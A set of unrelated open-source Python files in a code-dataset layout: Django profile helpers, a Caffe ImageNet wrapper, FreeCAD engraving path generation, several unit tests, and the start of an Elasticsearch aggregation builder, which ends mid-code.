Utility functions for retrieving and generating forms for the
site-specific user profile model specified in the
``AUTH_PROFILE_MODULE`` setting.
"""
from django import forms
from django.conf import settings
from django.contrib.auth.models import SiteProfileNotAvailable
from django.db.models import get_model
def get_profile_model():
    """
    Return the model class for the currently-active user profile
    model, as defined by the ``AUTH_PROFILE_MODULE`` setting. If that
    setting is missing or empty, raise
    ``django.contrib.auth.models.SiteProfileNotAvailable``.
    """
    module_path = getattr(settings, 'AUTH_PROFILE_MODULE', None)
    if not module_path:
        raise SiteProfileNotAvailable
    # The setting has the form "app_label.ModelName".
    model = get_model(*module_path.split('.'))
    if model is None:
        raise SiteProfileNotAvailable
    return model
def get_profile_form():
    """
    Return a form class (a subclass of the default ``ModelForm``)
    suitable for creating/editing instances of the site-specific user
    profile model, as defined by the ``AUTH_PROFILE_MODULE``
    setting. If that setting is missing, raise
    ``django.contrib.auth.models.SiteProfileNotAvailable``.
    """
    model_class = get_profile_model()

    class _ProfileForm(forms.ModelForm):
        class Meta:
            model = model_class
            # The user is filled in by the view, not by the form.
            exclude = ('user',)

    return _ProfileForm
| bsd-3-clause |
mjmarin/caffe | python/caffe/imagenet/wrapper.py | 20 | 3933 | #!/usr/bin/env python
"""wrapper.py implements an end-to-end wrapper that classifies an image read
from disk, using the imagenet classifier.
"""
import numpy as np
import os
from skimage import io
from skimage import transform
import caffe
IMAGE_DIM = 256
CROPPED_DIM = 227
# Load the imagenet mean file
IMAGENET_MEAN = np.load(
os.path.join(os.path.dirname(__file__), 'ilsvrc_2012_mean.npy'))
def oversample(image, center_only=False, image_dim=None, cropped_dim=None):
    """
    Oversamples an image. Currently the indices are hard coded to the
    4 corners and the center of the image, as well as their flipped ones,
    a total of 10 images.
    Input:
        image: an image of size (image_dim x image_dim x 3), e.g. uint8.
        center_only: if True, only return the center image.
        image_dim: input edge length; defaults to the module-level
            IMAGE_DIM (256).
        cropped_dim: crop edge length; defaults to the module-level
            CROPPED_DIM (227).
    Output:
        images: float32 crops of shape (10 x 3 x cropped_dim x cropped_dim),
            or (1 x 3 x cropped_dim x cropped_dim) if center_only.
    """
    # Resolve the defaults lazily so the module constants stay the single
    # source of truth while callers may still request other sizes.
    if image_dim is None:
        image_dim = IMAGE_DIM
    if cropped_dim is None:
        cropped_dim = CROPPED_DIM
    # HWC -> CHW so the crops are taken over the two trailing (spatial) axes.
    image = image.swapaxes(1, 2).swapaxes(0, 1)
    indices = [0, image_dim - cropped_dim]
    center = int(indices[1] / 2)
    if center_only:
        return np.ascontiguousarray(
            image[np.newaxis, :, center:center + cropped_dim,
                  center:center + cropped_dim],
            dtype=np.float32)
    else:
        images = np.empty((10, 3, cropped_dim, cropped_dim), dtype=np.float32)
        curr = 0
        # Four corner crops...
        for i in indices:
            for j in indices:
                images[curr] = image[:, i:i + cropped_dim, j:j + cropped_dim]
                curr += 1
        # ...plus the center crop...
        images[4] = image[:, center:center + cropped_dim,
                          center:center + cropped_dim]
        # ...and the horizontal mirror of each of the five crops.
        images[5:] = images[:5, :, :, ::-1]
        return images
def prepare_image(filename, center_only=False):
    """Load an image file and convert it into network-ready crops.

    Grayscale images are replicated to three channels and an alpha channel
    is dropped, so the network always sees an H x W x 3 input.
    """
    img = io.imread(filename)
    if img.ndim == 2:
        # Grayscale: replicate the single channel three times.
        img = np.tile(img[:, :, np.newaxis], (1, 1, 3))
    elif img.shape[2] == 4:
        # RGBA: drop the alpha channel.
        img = img[:, :, :3]
    # Resize to the canonical input size, rescale to [0, 255], and flip the
    # channel order from RGB to BGR (the mean file is stored as BGR).
    resized = transform.resize(img, (IMAGE_DIM, IMAGE_DIM)) * 255
    bgr = resized[:, :, ::-1]
    # Subtract the ImageNet channel mean in place.
    bgr -= IMAGENET_MEAN
    return oversample(bgr, center_only)
class ImageNetClassifier(object):
    """
    Thin wrapper around a pretrained imagenet ``caffe.Net`` that turns an
    image file into a vector of class scores, averaged over the crops.
    """

    def __init__(self, model_def_file, pretrained_model, center_only=False,
                 num_output=1000):
        # One crop when only the center is used, ten when oversampling.
        num_crops = 1 if center_only else 10
        self.caffenet = caffe.Net(model_def_file, pretrained_model)
        self._output_blobs = [np.empty((num_crops, num_output, 1, 1),
                                       dtype=np.float32)]
        self._center_only = center_only

    def predict(self, filename):
        """Classify one image file; return the mean score over all crops."""
        input_blob = [prepare_image(filename, self._center_only)]
        self.caffenet.Forward(input_blob, self._output_blobs)
        return self._output_blobs[0].mean(0).flatten()
def main(argv):
    """
    The main function will carry out classification.

    Classifies every ``*.<ext>`` file under --root with the given model and
    saves the (num_files x num_classes) score matrix to --output.
    NOTE: this module is Python 2 (print statements, gflags).
    """
    import gflags
    import glob
    import time
    gflags.DEFINE_string("root", "", "The folder that contains images.")
    gflags.DEFINE_string("ext", "JPEG", "The image extension.")
    gflags.DEFINE_string("model_def", "", "The model definition file.")
    gflags.DEFINE_string("pretrained_model", "", "The pretrained model.")
    gflags.DEFINE_string("output", "", "The output numpy file.")
    gflags.DEFINE_boolean("gpu", True, "use gpu for computation")
    FLAGS = gflags.FLAGS
    FLAGS(argv)
    net = ImageNetClassifier(FLAGS.model_def, FLAGS.pretrained_model)
    if FLAGS.gpu:
        print 'Use gpu.'
        net.caffenet.set_mode_gpu()
    # Sort for a deterministic row order in the output matrix.
    files = glob.glob(os.path.join(FLAGS.root, "*." + FLAGS.ext))
    files.sort()
    print 'A total of %d files' % len(files)
    output = np.empty((len(files), net._output_blobs[0].shape[1]),
                      dtype=np.float32)
    start = time.time()
    for i, f in enumerate(files):
        output[i] = net.predict(f)
        # Progress report every 1000 images.
        if i % 1000 == 0 and i > 0:
            print 'Processed %d files, elapsed %.2f s' % (i, time.time() - start)
    # Finally, write the results
    np.save(FLAGS.output, output)
    print 'Done. Saved to %s.' % FLAGS.output
if __name__ == "__main__":
    import sys
    main(sys.argv)
| bsd-2-clause |
metamx/Diamond | src/collectors/proc/test/testproc.py | 8 | 2268 | #!/usr/bin/python
# coding=utf-8
################################################################################
from test import CollectorTestCase
from test import get_collector_config
from test import unittest
from mock import Mock
from mock import patch
try:
from cStringIO import StringIO
StringIO # workaround for pyflakes issue #13
except ImportError:
from StringIO import StringIO
from diamond.collector import Collector
from proc import ProcessStatCollector
################################################################################
class TestProcessStatCollector(CollectorTestCase):
    """Unit tests for ProcessStatCollector (parses /proc/stat)."""

    def setUp(self):
        config = get_collector_config('ProcessStatCollector', {
            'interval': 1
        })
        self.collector = ProcessStatCollector(config, None)

    def test_import(self):
        self.assertTrue(ProcessStatCollector)

    @patch('__builtin__.open')
    @patch('os.access', Mock(return_value=True))
    @patch.object(Collector, 'publish')
    def test_should_open_proc_stat(self, publish_mock, open_mock):
        open_mock.return_value = StringIO('')
        self.collector.collect()
        open_mock.assert_called_once_with('/proc/stat', 'r')

    @patch.object(Collector, 'publish')
    def test_should_work_with_real_data(self, publish_mock):
        # The first collect() only primes the collector's internal state, so
        # no metrics are expected yet.
        ProcessStatCollector.PROC = self.getFixturePath('proc_stat_1')
        self.collector.collect()
        self.assertPublishedMany(publish_mock, {})
        ProcessStatCollector.PROC = self.getFixturePath('proc_stat_2')
        self.collector.collect()
        # BUG FIX: the expected-metrics dict literal previously listed ctxt,
        # btime, processes, procs_running and procs_blocked twice; duplicate
        # keys in a dict literal silently keep only the last value, so the
        # dead first set has been removed (the resulting dict is unchanged).
        metrics = {
            'ctxt': 1791,
            'btime': 1319181102,
            'processes': 2,
            'procs_running': 1,
            'procs_blocked': 0,
        }
        self.setDocExample(collector=self.collector.__class__.__name__,
                           metrics=metrics,
                           defaultpath=self.collector.config['path'])
        self.assertPublishedMany(publish_mock, metrics)
################################################################################
if __name__ == "__main__":
unittest.main()
| mit |
maurerpe/FreeCAD | src/Mod/Path/PathScripts/PathEngrave.py | 3 | 15461 | # -*- coding: utf-8 -*-
# ***************************************************************************
# * *
# * Copyright (c) 2014 Yorik van Havre <yorik@uncreated.net> *
# * *
# * This program is free software; you can redistribute it and/or modify *
# * it under the terms of the GNU Lesser General Public License (LGPL) *
# * as published by the Free Software Foundation; either version 2 of *
# * the License, or (at your option) any later version. *
# * for detail see the LICENCE text file. *
# * *
# * This program is distributed in the hope that it will be useful, *
# * but WITHOUT ANY WARRANTY; without even the implied warranty of *
# * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the *
# * GNU Library General Public License for more details. *
# * *
# * You should have received a copy of the GNU Library General Public *
# * License along with this program; if not, write to the Free Software *
# * Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 *
# * USA *
# * *
# ***************************************************************************
import FreeCAD
import FreeCADGui
import Path
import Draft
from PySide import QtCore, QtGui
from PathScripts import PathUtils
"""Path Engrave object and FreeCAD command"""
# Qt tanslation handling
try:
_encoding = QtGui.QApplication.UnicodeUTF8
def translate(context, text, disambig=None):
return QtGui.QApplication.translate(context, text, disambig, _encoding)
except AttributeError:
def translate(context, text, disambig=None):
return QtGui.QApplication.translate(context, text, disambig)
class ObjectPathEngrave:
    """Feature proxy for an Engrave path operation.

    Generates G-code that traces the wires of the Base geometry (typically
    a Draft ShapeString) at a fixed engraving depth.
    """

    def __init__(self, obj):
        obj.addProperty("App::PropertyLinkSubList", "Base", "Path", "The base geometry of this object")
        obj.addProperty("App::PropertyBool", "Active", "Path", "Make False, to prevent operation from generating code")
        obj.addProperty("App::PropertyString", "Comment", "Path", "An optional comment for this profile")
        obj.addProperty("App::PropertyString", "UserLabel", "Path", "User Assigned Label")
        obj.addProperty("App::PropertyEnumeration", "Algorithm", "Algorithm", "The library or Algorithm used to generate the path")
        obj.Algorithm = ['OCC Native']
        # Tool Properties
        obj.addProperty("App::PropertyIntegerConstraint", "ToolNumber", "Tool", "The tool number in use")
        obj.ToolNumber = (0, 0, 1000, 1)
        obj.setEditorMode('ToolNumber', 1)  # make this read only
        obj.addProperty("App::PropertyString", "ToolDescription", "Tool", "The description of the tool ")
        obj.setEditorMode('ToolDescription', 1)  # make this read only
        # Depth Properties
        obj.addProperty("App::PropertyDistance", "ClearanceHeight", "Depth", "The height needed to clear clamps and obstructions")
        obj.addProperty("App::PropertyDistance", "SafeHeight", "Depth", "Rapid Safety Height between locations.")
        obj.addProperty("App::PropertyDistance", "StartDepth", "Depth", "Starting Depth of Tool- first cut depth in Z")
        obj.addProperty("App::PropertyDistance", "FinalDepth", "Depth", "Final Depth of Tool- lowest value in Z")
        obj.addProperty("App::PropertyInteger", "StartVertex", "Path", "The vertex index to start the path from")
        if FreeCAD.GuiUp:
            _ViewProviderEngrave(obj.ViewObject)
        obj.Proxy = self

    def __getstate__(self):
        # Nothing beyond the document properties needs to be serialized.
        return None

    def __setstate__(self, state):
        return None

    def onChanged(self, obj, prop):
        if prop == "UserLabel":
            # Keep the visible label in sync with the user-assigned name.
            obj.Label = obj.UserLabel + " :" + obj.ToolDescription

    def execute(self, obj):
        """Regenerate obj.Path from the Base geometry and tool settings."""
        output = ""
        if obj.Comment != "":
            output += '(' + str(obj.Comment) + ')\n'
        toolLoad = PathUtils.getLastToolLoad(obj)
        if toolLoad is None or toolLoad.ToolNumber == 0:
            # No tool controller found: fall back to safe defaults.
            self.vertFeed = 100
            self.horizFeed = 100
            self.radius = 0.25
            obj.ToolNumber = 0
            obj.ToolDescription = "UNDEFINED"
        else:
            self.vertFeed = toolLoad.VertFeed.Value
            self.horizFeed = toolLoad.HorizFeed.Value
            tool = PathUtils.getTool(obj, toolLoad.ToolNumber)
            self.radius = tool.Diameter / 2
            obj.ToolNumber = toolLoad.ToolNumber
            obj.ToolDescription = toolLoad.Name
        if obj.UserLabel == "":
            obj.Label = obj.Name + " :" + obj.ToolDescription
        else:
            obj.Label = obj.UserLabel + " :" + obj.ToolDescription
        if obj.Base:
            for o in obj.Base:
                # BUG FIX: the rapid retract was emitted as "G0 <number>"
                # with no axis word; it must be a Z move.
                output += "G0 Z" + str(obj.ClearanceHeight.Value) + "\n"
                # we only consider the outer wire if this is a Face
                wires = o[0].Shape.Wires
                if obj.Algorithm == "OCC Native":
                    output += self.buildpathocc(obj, wires)
        if output == "":
            output += "G0"
        if obj.Active:
            path = Path.Path(output)
            obj.Path = path
            obj.ViewObject.Visibility = True
        else:
            path = Path.Path("(inactive operation)")
            obj.Path = path
            obj.ViewObject.Visibility = False

    def buildpathocc(self, obj, wires):
        """Create a G-code string tracing the given wires (OCC algorithm).

        BUG FIX: several commands below were concatenated without a
        terminating newline, fusing two G-code commands onto one line
        (e.g. "G0 Z10G0 X..."); every command now ends with "\\n", and the
        plunge move gained the missing space before its F word.
        """
        import Part
        import DraftGeomUtils
        # absolute coords, millimeters, cancel offsets
        output = "G90\nG21\nG40\n"
        output += "G0 Z" + str(obj.ClearanceHeight.Value) + "\n"
        for wire in wires:
            offset = wire
            # reorder the wire
            offset = DraftGeomUtils.rebaseWire(offset, obj.StartVertex)
            # we create the path from the offset shape
            last = None
            for edge in offset.Edges:
                if not last:
                    # we set the first move to our first point:
                    # rapid to the XY start position, then feed down to depth
                    # at the vertical feed rate.
                    last = edge.Vertexes[0].Point
                    output += "G0" + " X" + str("%f" % last.x) + " Y" + str("%f" % last.y) + "\n"
                    output += "G1" + " Z" + str("%f" % last.z) + " F " + str(self.vertFeed) + "\n"
                if isinstance(edge.Curve, Part.Circle):
                    point = edge.Vertexes[-1].Point
                    if point == last:  # edges can come flipped
                        point = edge.Vertexes[0].Point
                    center = edge.Curve.Center
                    relcenter = center.sub(last)
                    v1 = last.sub(center)
                    v2 = point.sub(center)
                    # Arc direction from the cross product: CW -> G2, CCW -> G3.
                    if v1.cross(v2).z < 0:
                        output += "G2"
                    else:
                        output += "G3"
                    output += " X" + str("%f" % point.x) + " Y" + str("%f" % point.y) + " Z" + str("%f" % point.z)
                    output += " I" + str("%f" % relcenter.x) + " J" + str("%f" % relcenter.y) + " K" + str("%f" % relcenter.z)
                    output += " F " + str(self.horizFeed)
                    output += "\n"
                    last = point
                else:
                    point = edge.Vertexes[-1].Point
                    if point == last:  # edges can come flipped
                        point = edge.Vertexes[0].Point
                    output += "G1 X" + str("%f" % point.x) + " Y" + str("%f" % point.y) + " Z" + str("%f" % point.z)
                    output += " F " + str(self.horizFeed)
                    output += "\n"
                    last = point
            # Retract to the safe height before moving to the next wire.
            output += "G0 Z" + str(obj.SafeHeight.Value) + "\n"
        return output

    def addShapeString(self, obj, ss):
        """Append a Draft ShapeString to Base, guessing heights on first add."""
        baselist = obj.Base
        if len(baselist) == 0:  # When adding the first base object, guess at heights
            try:
                bb = ss.Shape.BoundBox  # parent boundbox
                obj.StartDepth = bb.ZMax
                obj.ClearanceHeight = bb.ZMax + 5.0
                obj.SafeHeight = bb.ZMax + 3.0
                obj.FinalDepth = bb.ZMin
            except:
                obj.StartDepth = 5.0
                obj.ClearanceHeight = 10.0
                obj.SafeHeight = 8.0
        item = (ss, "")
        if item in baselist:
            FreeCAD.Console.PrintWarning("ShapeString already in the Engraving list" + "\n")
        else:
            baselist.append(item)
        obj.Base = baselist
        self.execute(obj)
class _ViewProviderEngrave:
    """View provider for ObjectPathEngrave: opens the Engrave task panel
    when the object is edited and supplies its tree icon."""
    def __init__(self, vobj):
        vobj.Proxy = self
    def attach(self, vobj):
        # Keep a reference to the underlying document object.
        self.Object = vobj.Object
        return
    def setEdit(self, vobj, mode=0):
        # Replace any open task dialog with the Engrave editor panel.
        FreeCADGui.Control.closeDialog()
        taskd = TaskPanel()
        taskd.obj = vobj.Object
        FreeCADGui.Control.showDialog(taskd)
        taskd.setupUi()
        return True
    def getIcon(self):
        # NOTE(review): reuses the Profile icon; presumably no dedicated
        # Engrave icon exists in the resource file -- confirm.
        return ":/icons/Path-Profile.svg"
    def __getstate__(self):
        # Nothing to serialize; the proxy is recreated on document load.
        return None
    def __setstate__(self, state):
        return None
class CommandPathEngrave:
    """GUI command that creates a new Engrave operation in the document."""

    def GetResources(self):
        return {'Pixmap': 'Path-Engrave',
                'MenuText': QtCore.QT_TRANSLATE_NOOP("Path_Engrave", "ShapeString Engrave"),
                'ToolTip': QtCore.QT_TRANSLATE_NOOP("Path_Engrave", "Creates an Engraving Path around a Draft ShapeString")}

    def IsActive(self):
        return FreeCAD.ActiveDocument is not None

    def Activated(self):
        # if everything is ok, execute and register the transaction in the undo/redo stack
        FreeCAD.ActiveDocument.openTransaction("Create Engrave Path")
        # BUG FIX: the command previously loaded PathScripts.PathFaceProfile
        # (a copy/paste leftover); the doCommand below references
        # PathScripts.PathEngrave, so that is the module which must be loaded.
        FreeCADGui.addModule("PathScripts.PathEngrave")
        FreeCADGui.addModule("PathScripts.PathUtils")
        FreeCADGui.doCommand('obj = FreeCAD.ActiveDocument.addObject("Path::FeaturePython", "PathEngrave")')
        FreeCADGui.doCommand('PathScripts.PathEngrave.ObjectPathEngrave(obj)')
        FreeCADGui.doCommand('obj.ClearanceHeight = 10')
        FreeCADGui.doCommand('obj.StartDepth= 0')
        FreeCADGui.doCommand('obj.FinalDepth= -0.1')
        FreeCADGui.doCommand('obj.SafeHeight= 5.0')
        FreeCADGui.doCommand('PathScripts.PathUtils.addToProject(obj)')
        FreeCAD.ActiveDocument.commitTransaction()
        FreeCAD.ActiveDocument.recompute()
        FreeCADGui.doCommand('obj.ViewObject.startEditing()')
class TaskPanel:
    """Task-dialog controller for editing an Engrave operation.

    ``self.obj`` (the edited document object) is assigned by the caller
    (see _ViewProviderEngrave.setEdit) before setupUi() runs.
    """
    def __init__(self):
        self.form = FreeCADGui.PySideUic.loadUi(":/panels/EngraveEdit.ui")
    def accept(self):
        # Commit the form values, close the dialog and detach the observer.
        self.getFields()
        FreeCADGui.ActiveDocument.resetEdit()
        FreeCADGui.Control.closeDialog()
        FreeCAD.ActiveDocument.recompute()
        FreeCADGui.Selection.removeObserver(self.s)
    def reject(self):
        # Close without committing the form values.
        FreeCADGui.Control.closeDialog()
        FreeCAD.ActiveDocument.recompute()
        FreeCADGui.Selection.removeObserver(self.s)
    def getFields(self):
        # Push the form's text fields into the object's Distance properties,
        # then re-run the path generation.
        if self.obj:
            if hasattr(self.obj, "StartDepth"):
                self.obj.StartDepth = self.form.startDepth.text()
            if hasattr(self.obj, "FinalDepth"):
                self.obj.FinalDepth = self.form.finalDepth.text()
            if hasattr(self.obj, "SafeHeight"):
                self.obj.SafeHeight = self.form.safeHeight.text()
            if hasattr(self.obj, "ClearanceHeight"):
                self.obj.ClearanceHeight = self.form.clearanceHeight.text()
            self.obj.Proxy.execute(self.obj)
    def setFields(self):
        # Mirror the object's current property values into the form widgets.
        self.form.startDepth.setText(str(self.obj.StartDepth.Value))
        self.form.finalDepth.setText(str(self.obj.FinalDepth.Value))
        self.form.safeHeight.setText(str(self.obj.SafeHeight.Value))
        self.form.clearanceHeight.setText(str(self.obj.ClearanceHeight.Value))
        self.form.baseList.clear()
        for i in self.obj.Base:
            self.form.baseList.addItem(i[0].Name)
    def open(self):
        self.s = SelObserver()
        # install the function mode resident
        FreeCADGui.Selection.addObserver(self.s)
    def addBase(self):
        # check that the selection contains exactly what we want
        selection = FreeCADGui.Selection.getSelectionEx()
        if not len(selection) >= 1:
            FreeCAD.Console.PrintError(translate("Path_Engrave", "Please select at least one ShapeString\n"))
            return
        for s in selection:
            if not Draft.getType(s.Object) == "ShapeString":
                FreeCAD.Console.PrintError(translate("Path_Engrave", "Please select at least one ShapeString\n"))
                return
            self.obj.Proxy.addShapeString(self.obj, s.Object)
        self.setFields()
    def deleteBase(self):
        # Rebuild Base without the entries matching the selected list rows.
        dlist = self.form.baseList.selectedItems()
        for d in dlist:
            newlist = []
            for i in self.obj.Base:
                if not i[0].Name == d.text():
                    newlist.append(i)
            self.obj.Base = newlist
            self.form.baseList.takeItem(self.form.baseList.row(d))
    def itemActivated(self):
        # Mirror the list-widget selection into the 3D-view selection.
        FreeCADGui.Selection.clearSelection()
        slist = self.form.baseList.selectedItems()
        for i in slist:
            o = FreeCAD.ActiveDocument.getObject(i.text())
            FreeCADGui.Selection.addSelection(o)
        FreeCADGui.updateGui()
    def reorderBase(self):
        # NOTE(review): this appends bare document objects to Base, while
        # deleteBase/setFields expect (object, subname) tuples as created by
        # addShapeString -- looks inconsistent, confirm against
        # PropertyLinkSubList semantics.
        newlist = []
        for i in range(self.form.baseList.count()):
            s = self.form.baseList.item(i).text()
            obj = FreeCAD.ActiveDocument.getObject(s)
            newlist.append(obj)
        self.obj.Base = newlist
        self.obj.Proxy.execute(self.obj)
        FreeCAD.ActiveDocument.recompute()
    def getStandardButtons(self):
        return int(QtGui.QDialogButtonBox.Ok)
    def setupUi(self):
        # Connect Signals and Slots
        self.form.startDepth.editingFinished.connect(self.getFields)
        self.form.finalDepth.editingFinished.connect(self.getFields)
        self.form.safeHeight.editingFinished.connect(self.getFields)
        self.form.clearanceHeight.editingFinished.connect(self.getFields)
        self.form.addBase.clicked.connect(self.addBase)
        self.form.deleteBase.clicked.connect(self.deleteBase)
        self.form.reorderBase.clicked.connect(self.reorderBase)
        self.form.baseList.itemSelectionChanged.connect(self.itemActivated)
        # If something suitable is already selected, add it right away.
        sel = FreeCADGui.Selection.getSelectionEx()
        if len(sel) != 0:
            self.addBase()
        self.setFields()
class SelObserver:
    """Selection observer active while the Engrave task panel is open:
    installs the engrave selection gate and mirrors picks into the GUI."""
    def __init__(self):
        import PathScripts.PathSelection as PST
        # Restrict selectable geometry to what the Engrave op accepts.
        PST.engraveselect()
    def __del__(self):
        import PathScripts.PathSelection as PST
        # Remove the selection gate when the observer is discarded.
        PST.clear()
    def addSelection(self, doc, obj, sub, pnt):
        # Re-issue the selection through doCommand so it is macro-recordable.
        FreeCADGui.doCommand('Gui.Selection.addSelection(FreeCAD.ActiveDocument.' + obj + ')')
        FreeCADGui.updateGui()
# Register the GUI command only when FreeCAD is running with a GUI.
if FreeCAD.GuiUp:
    FreeCADGui.addCommand('Path_Engrave', CommandPathEngrave())
| lgpl-2.1 |
carlohamalainen/nipype | nipype/interfaces/slicer/registration/tests/test_auto_ACPCTransform.py | 5 | 1197 | # AUTO-GENERATED by tools/checkspecs.py - DO NOT EDIT
from nipype.testing import assert_equal
from nipype.interfaces.slicer.registration.specialized import ACPCTransform
def test_ACPCTransform_inputs():
    # Expected trait metadata for every ACPCTransform input, keyed by trait
    # name.  NOTE: this file is auto-generated by tools/checkspecs.py --
    # regenerate it rather than hand-editing when the interface changes.
    input_map = dict(acpc=dict(argstr='--acpc %s...',
    ),
    args=dict(argstr='%s',
    ),
    debugSwitch=dict(argstr='--debugSwitch ',
    ),
    environ=dict(nohash=True,
    usedefault=True,
    ),
    ignore_exception=dict(nohash=True,
    usedefault=True,
    ),
    midline=dict(argstr='--midline %s...',
    ),
    outputTransform=dict(argstr='--outputTransform %s',
    hash_files=False,
    ),
    terminal_output=dict(mandatory=True,
    nohash=True,
    ),
    )
    inputs = ACPCTransform.input_spec()
    # nose-style generator test: one yielded assertion per (trait, metakey).
    for key, metadata in input_map.items():
        for metakey, value in metadata.items():
            yield assert_equal, getattr(inputs.traits()[key], metakey), value
def test_ACPCTransform_outputs():
    # Expected trait metadata for every ACPCTransform output (auto-generated;
    # see the note in test_ACPCTransform_inputs).
    output_map = dict(outputTransform=dict(),
    )
    outputs = ACPCTransform.output_spec()
    for key, metadata in output_map.items():
        for metakey, value in metadata.items():
            yield assert_equal, getattr(outputs.traits()[key], metakey), value
| bsd-3-clause |
srisankethu/coala-bears | tests/c_languages/ClangComplexityBearTest.py | 24 | 3773 | import os
import unittest
from queue import Queue
from clang.cindex import Index
from coalib.results.Result import Result
from coalib.results.SourceRange import SourceRange
from coalib.settings.Section import Section
from bears.c_languages.ClangComplexityBear import (
ClangComplexityBear)
from coalib.testing.BearTestHelper import generate_skip_decorator
from coalib.testing.LocalBearTestHelper import execute_bear
@generate_skip_decorator(ClangComplexityBear)
class ClangComplexityBearTest(unittest.TestCase):
    """Tests for ClangComplexityBear's cyclomatic-complexity computation."""
    def setUp(self):
        self.filename = os.path.abspath(os.path.join(os.path.dirname(__file__),
                                                     'codeclone_detection',
                                                     'conditions_samples.c'))
        self.file = 'fake'
        self.queue = Queue()
        self.section = Section('test section')
        self.bear = ClangComplexityBear(self.section, self.queue)
    def test_calculation(self):
        """
        Testing that number of decision points and exit points are calculated
        correctly.
        """
        expected = [
            ('used(int, int)', 3),
            ('returned(int, int)', 1),
            ('loopy(int, int)', 5),
            ('in_condition(int, int)', 1),
            ('assignation(int, int)', 2),
            ('arithmetics(int, int)', 1),
            ('levels(int, int, int)', 10),
            ('structing(struct test_struct, struct test_struct *)', 1),
            ('switching(int, int)', 2)]
        root = Index.create().parse(self.filename).cursor
        complexities_gen = self.bear.complexities(root, self.filename)
        results = [(cursor.displayname, complexity)
                   for cursor, complexity in complexities_gen]
        self.assertSequenceEqual(results, expected)
    def test_output(self):
        """
        Validating that the yielded results are correct.
        """
        affected_code = (SourceRange.from_values(
            self.filename,
            start_line=111,
            start_column=1,
            end_line=143,
            end_column=2),)
        expected_result = Result(
            self.bear,
            "The function 'levels(int, int, int)' should be simplified. Its "
            'cyclomatic complexity is 10 which exceeds maximal recommended '
            'value of 8.',
            affected_code=affected_code)
        with execute_bear(self.bear, self.filename, self.file, 8) as out:
            self.assertEqual(len(out), 1)
            out[0].additional_info = ''  # Let's not test this, static and huge
            self.assertEqual(out[0], expected_result)
    def test_empty_declared_function(self):
        """
        Should not take into account and display empty function declarations.
        """
        self.filename = os.path.abspath(os.path.join(os.path.dirname(__file__),
                                                     'test_files',
                                                     'empty_declarations.c'))
        expected = [('with_body(int *)', 1)]
        root = Index.create().parse(self.filename).cursor
        complexities_gen = self.bear.complexities(root, self.filename)
        results = [(cursor.displayname, complexity)
                   for cursor, complexity in complexities_gen]
        self.assertSequenceEqual(results, expected)
    def test_file_does_not_exist(self):
        """
        Tests that bear throws TranslationUnitLoadError when file does not
        exist.
        """
        from clang.cindex import TranslationUnitLoadError
        generator = self.bear.execute('not_existing', self.file)
        self.assertNotEqual(generator, None)
        # NOTE(review): the ``yield`` below turns this whole test method into
        # a generator function, so under plain unittest the body (including
        # the assertions above) is never executed and the test passes
        # vacuously.  Consuming the generator inside the context manager,
        # e.g. ``list(generator)``, is probably what was intended -- confirm.
        with self.assertRaisesRegex(TranslationUnitLoadError, 'C value error'):
            yield generator
| agpl-3.0 |
tcarver/django-elastic | elastic/aggs.py | 2 | 4485 | ''' Define elastic aggregation(s) to be used in a search. '''
from elastic.query import Query
from elastic.exceptions import AggregationError
class Aggs:
    ''' Container for one or more Agg instances, rendered under the
    top-level "aggregations" key of a search body. '''
    def __init__(self, agg_arr=None):
        ''' @param agg_arr: a single Agg instance or a list of them.
        @raise AggregationError: if any element is not an Agg. '''
        aggregations = {}
        if agg_arr is not None:
            agg_list = agg_arr if isinstance(agg_arr, list) else [agg_arr]
            for agg in agg_list:
                if not isinstance(agg, Agg):
                    raise AggregationError('not an aggregation')
                aggregations.update(agg.agg)
        self.aggs = {"aggregations": aggregations}
class Agg:
    ''' Aggregation Builder: validates an aggregation body against the
    AGGS schema and renders it as ``{agg_name: {agg_type: body, ...}}``. '''
    # Schema of supported aggregation types: "type" is the expected body
    # type, optional "params" maps allowed parameter names to their types,
    # "dict_type" marks bodies whose nested values may be Query objects.
    AGGS = {
        # metric aggregation
        "avg": {"type": dict, "params": {"field": str}},
        "min": {"type": dict, "params": {"field": str}},
        "max": {"type": dict, "params": {"field": str}},
        "sum": {"type": dict, "params": {"field": str}},
        "stats": {"type": dict, "params": {"field": str}},
        "extended_stats": {"type": dict, "params": {"field": str}},
        "value_count": {"type": dict, "params": {"field": str}},
        "top_hits": {"type": dict, "params": {"from": int, "size": int, "sort": list,
                                              "_source": list, "highlight": dict}},
        # bucket aggregation
        "global": {"type": dict},
        "filter": {"type": Query},
        "filters": {"type": dict, "dict_type": Query},
        "missing": {"type": dict, "params": {"field": str}},
        "terms": {"type": dict, "params": {"field": str, "size": int, "order": (dict, list)}},
        "significant_terms": {"type": dict, "params": {"field": str}},
        "range": {"type": dict, "params": {"field": str, 'ranges': list}},
        "nested": {"type": dict, "params": {"path": str}},
        "reverse_nested": {"type": dict, "params": {"path": str}}
    }
    def __init__(self, agg_name, agg_type, agg_body, sub_agg=None):
        ''' Construct an aggregation based on the aggregation type.
        @type agg_name: str
        @param agg_name: Aggregation name.
        @type agg_type: str
        @param agg_type: Aggregation type (from AGGS).
        @type agg_body: dict
        @param agg_body: Aggregation body.
        @type sub_agg: Agg
        @param sub_agg: Bucketing aggregations can have sub-aggregations.
        '''
        self.agg = {agg_name: {}}
        AGGS = Agg.AGGS
        if agg_type in AGGS:
            # NOTE(review): if agg_body is not of the expected type, this
            # branch silently leaves the aggregation empty rather than
            # raising -- presumably intentional, but confirm.
            if isinstance(agg_body, AGGS[agg_type]["type"]):
                if 'params' in Agg.AGGS[agg_type]:
                    # Validate parameter names and their value types.
                    for pkey in agg_body:
                        if pkey not in Agg.AGGS[agg_type]['params']:
                            raise AggregationError(pkey+' unrecognised aggregation parameter')
                        if not isinstance(agg_body[pkey], Agg.AGGS[agg_type]['params'][pkey]):
                            raise AggregationError('aggregation parameter incorrect type')
                if 'list_type' in AGGS[agg_type]:
                    # List-typed bodies: unwrap any Query elements.
                    Agg._array_types(agg_body, AGGS[agg_type]['list_type'])
                    str_arr = []
                    [str_arr.append(Agg._get_query(q)) for q in agg_body]
                    self.agg[agg_name][agg_type] = str_arr
                elif 'dict_type' in AGGS[agg_type]:
                    # Recursively unwrap Query instances nested in the dict.
                    self.agg[agg_name][agg_type] = self._update_dict(agg_body)
                else:
                    self.agg[agg_name][agg_type] = Agg._get_query(agg_body)
        else:
            raise AggregationError('aggregation type unknown: '+agg_type)
        if sub_agg is not None:
            # Attach sub-aggregations under the "aggs" key.
